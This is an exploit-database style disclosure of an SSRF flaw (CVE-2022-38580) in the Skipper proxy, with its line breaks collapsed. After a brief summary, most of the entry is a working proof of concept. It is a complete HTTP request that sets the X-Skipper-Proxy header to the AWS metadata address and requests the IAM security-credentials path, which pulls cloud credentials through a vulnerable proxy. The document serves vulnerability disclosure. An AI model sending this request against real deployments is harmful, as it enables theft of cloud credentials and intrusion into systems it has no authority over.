X-Skipper-Proxy 0.13.237 Server-Side Request Forgery

#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)#Date: 24/10/2022#Exploit Author: Hosein Vita & Milad Fadavvi#Vendor Homepage: https://github.com/zalando/skipper#Software Link: https://github.com/zalando/skipper#Version: < v0.13.237#Tested on: Linux#CVE: CVE-2022-38580Summary:Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.Proof Of Concept:1- Add header "X-Skipper-Proxy"  to your request2- Add the aws metadata to the pathGET /latest/meta-data/iam/security-credentials HTTP/1.1Host: yourskipperdomain.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36X-Skipper-Proxy: http://169.254.169.254Connection: closeReference:https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2